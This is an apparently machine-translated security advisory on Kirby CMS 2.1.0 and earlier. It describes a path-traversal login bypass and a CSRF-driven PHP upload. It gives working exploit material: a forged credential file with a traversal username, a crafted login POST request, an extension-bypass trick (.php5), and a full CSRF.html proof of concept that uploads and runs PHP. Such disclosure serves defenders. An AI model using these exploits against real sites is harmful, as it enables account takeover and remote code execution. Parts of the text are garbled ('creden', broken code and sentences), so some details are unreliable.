Multi-Vulnerability Analysis of Kirby CMS

Multi-Vulnerability Analysis of Kirby CMS

Kirby CMS is an easy-to-use, easy-to-install and setup CMS system that uses file system storage without database support. Supports Markdown syntax, templates, and plug-ins.

Vulnerability details

Two vulnerabilities are found in the Kirby CMS:

1. bypass authentication through Path Traversal

2. CSRF upload and PHP Script Execution

Path Traversal bypass authentication

One of the vulnerabilities in KirbyCMS allows attackers to save/read contents in the directory of the hosted environment.

Because KirbyCMS is a file-based content management system, it also stores authentication data files in the account directory. each user has its own password file, which is named like: kirby/site/accounts/[username]. php

On the logon page, refer to the password file to verify the password hash. In this process, it cannot verify the generated path and make sure that the traversal path sequence is not included, for example, '../' in the login variable provided by the user '../'

This leads to a path traversal vulnerability. Attackers can bypass authentication and write files to public directories such as/tmp in the same multi-user hosting environment.

The vulnerability code exists in the kirby/core/user. php file:

abstract class UserAbstract {  protected $username = null;  protected $cache = array();  protected $data = null;  public function __construct($username) {    $this->username = str::lower($username);    // check if the account file exists    if(!file_exists($this->file())) {      throw new Exception('The user account could not be found');    }        ...  }  protected function file() {    return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';  }

In addition, when attempting to bypass authentication, we found that KirbyCMS allowed Authentication Over HTTP, and the authentication session never ended.

Concept Verification

KirbyCMS saves the creden。 as a PHP file in the kirby/site/accounts directory to prevent direct access to the content through the network server.
The Credential file is like the following:
Php if (! Defined ('kilby') exit?>
Username: victim
Email: victim@mailserver.com
Password:>
$ 2a $10 $ B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC
Language: en
Role: admin

To bypass identity authentication, an attacker with an account in the same hosting environment can write the above credenhash, including the encrypted password hash, to a public directory, such as/tmp/bypassauth. php.

Due to this path traversal vulnerability, attackers can use such creden as administrators to log on (http://victim-server.com/kirby/panel/login)
Username:.../../tmp/bypassauth
Password: trythisout

Then an http post request is generated, which is similar:
POST/kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID = mqhncr49bpbgnt9kqrp055v7r6; kirby = 58eddb6...
Content-Length: 149
Username = .. % 2F .. % 2F .. % 2F .. % 2F .. % 2F .. % 2F .. % 2F .. % 2 Ftmp % 2 Fbypassauth & password = trythisout & _ csfr = erQ1UvOm2L1...

This will cause the KirbyCMS slave path (/sites/victim/kirby/site/accounts /.. /.. /.. /.. /.. /.. /.. /.. /tmp/bypassauth. php) load the credential.

Finally, attackers can obtain the following response:
Class = "hgroup-single-line cf">
Class = "hgroup-title">
Href = "#/users/edit/.../../tmp/bypassauth"> Your account
Class = "hgroup-options shiv-dark shiv-left">

The administrator privilege of the KirbyCMS Management Panel is obtained.

CSRF upload and PHP Script Execution

There is also a vulnerability in KirbyCMS that allows uploading PHP script files that are generally not allowed. This vulnerability can only be exploited by authenticated users, and administrator permissions are not required.

In addition, KirbyCMS has another vulnerability, CSRF (Cross-Site Request Forgery). If attackers trick users into accessing a phishing site, this may cause an attacker to use an authenticated user to upload files. This will cause an unauthenticated attacker to modify or upload the content.
Combined with these two vulnerabilities, we can execute any PHP code.

PHP Script Execution

In addition to allowing the Administrator to upload content, KirbyCMS also runs a low-Permission user that can access the management background to upload content. The upload function allows you to upload images and other media files.

KirbyCMS performs the following filtering operations before saving the uploaded files:

  protected function checkUpload($file, $blueprint) {    if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {      throw new Exception('Content files cannot be uploaded');    } else if(strtolower($file->extension()) == 'php' or              in_array($file->mime(), f::$mimes['php'])) {      throw new Exception('PHP files cannot be uploaded');    } else if(strtolower($file->extension()) == 'html' or              $file->mime() == 'text/html') {      throw new Exception('HTML files cannot be uploaded');    ...   }

We can see that the method of detecting PHP files is to check whether the file suffix is ". PHP", or if the MIME type of the file is defined as PHP. If both conditions are met, the upload function will be stopped by the KirbyCMS.

Unfortunately, these two detection options are easily bypassed.

Many server configurations, such as Ubuntu or Debian PHP script Suffix:. php,. php4,. php5. You only need to change the suffix of the malicious PHP script to. php4 and. php5 to bypass. MIME type detection only requires

As the upload directory, script settings are disabled by default. Attackers can upload and execute arbitrary PHP scripts by bypassing the detection.

CSRF (Cross-Site Request Forgery)

Only Authenticated administrator users or Editing Users are allowed to upload media files. However, the upload function of KirbyCMS does not protect cross-site request forgery.

Concept Verification

The two vulnerabilities mentioned above can be linked. Attackers can prepare a malicious page that can upload arbitrary PHP files and trick users who have passed the KirbyCMS authentication to access them.

CSRF.html file (see

Requests sent by CSRF.html:

POST /kirby/panel/api/files/upload/about HTTP/1.1Host: victim_kirby_serverContent-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822Content-Length: 261Origin: nullCookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00...-----------------------------4679830631250006491995140822Content-Disposition: form-data; name="file"; filename="kirbyexec.php5"Content-Type: application/x-phpxml >phpphpinfo();?>-----------------------------4679830631250006491995140822--

Upload the file to the kirby/content/1-about directory of the server and access malicious files through http: // victim_kirby_server/kirby/content/1-about/kirbyexec. php5
The phpinfo () page is displayed.

CSRF.html

   onload="kirbySend()">         function kirbySend()      {        var xhr = new XMLHttpRequest();        xhr.open("POST", "http://victim_kirby_server/kirby/panel/api/files/upload/about", true);        xhr.setRequestHeader("Accept", "application/json");        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------4679830631250006491995140822");        xhr.withCredentials = true;        var body = "-----------------------------4679830631250006491995140822\r\n" +          "Content-Disposition: form-data; name=\"file\"; filename=\"kirbyexec.php5\"\r\n" +          "Content-Type: application/x-php\r\n" +          "\r\n" +          "\x3c?xml \x3e\n" +          "\x3c?php\n" +          "\n" +          "phpinfo();\n" +          "\n" +          "?\x3e\n" +          "\n" +          "\n" +          "\r\n" +          "-----------------------------4679830631250006491995140822--\r\n";        var aBody = new Uint8Array(body.length);        for (var i = 0; i  aBody.length; i++)          aBody[i] = body.charCodeAt(i);        xhr.send(new Blob([aBody]));      }        action="#">       type="button" value="Re-submit request to Kirby" onclick="kirbySend();" />

 
Affected Versions

Kirby CMS version 2.1.0 and earlier versions.